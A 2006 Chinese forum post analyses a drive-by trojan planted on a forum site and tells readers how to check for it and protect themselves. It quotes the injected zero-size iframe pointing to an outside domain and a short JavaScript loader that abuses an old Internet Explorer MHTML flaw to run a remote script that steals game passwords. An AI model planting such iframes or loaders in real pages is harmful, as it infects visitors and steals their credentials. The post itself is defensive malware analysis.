前段时间当你访问http://www.wangqiu.net/bbs/时,杀毒软件会提示发现病毒,状态栏会看到正在打开http://down.gament.net/q/q05,查看网页代码,有几行:
<iframe height=0 width=0 src="http://down.gament.net/q/z13"></iframe>
代码。打开上面这个地址,发现其内容为:
<script language="javascript" src="ah.js"></script>
下载ah.js,其内容为:
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A\\%2Emht%21'+GIF89a+'%2f1.js::/%23"></OBJECT>');
这段代码将利用windows的漏洞运行ah.js,病毒危害不大。目前已证实此病毒为传奇木马病毒,危害仅限于窃取传奇密码。并且,补丁完整的IE用户并不会感染此病毒。
冤有头,债有主
入侵者的行动不仅仅是不道德的,更是犯罪。他除了会遭到正义的唾弃外,必将受到法律的制裁。
看看您是否已经中毒
很多用户关心自己是否中毒(虽然可能对自己并没有危害),那么请用下面的方法检查:
Windopws 2000 系统用户请查找: C:\WINNT\system32\wstime.exe
Windows XP系统用户请查找: C:\Windows\system32\wstime.exe
病毒名字为:
毒霸:Win32.Troj.Mir2.ap.72898
诺顿:W32.Spybot.Worm
瑞星:Trojan.PSW.Lmir.izs
江民:Exploit.MhtRedir.wmm
如果有的话,请先结束这个进程,并删除对应文件。
经过一段时间也可能换了另一种病毒,如果不放心:
1、安装系统漏洞补丁
2、及时更新您的杀毒软件
经搜索发现,很多网站、论坛被植入该病毒,为了您访问网络时的安全考虑,请尽快完成以上两步操作。
[此贴子已经被作者于2006-4-16 23:03:54编辑过]
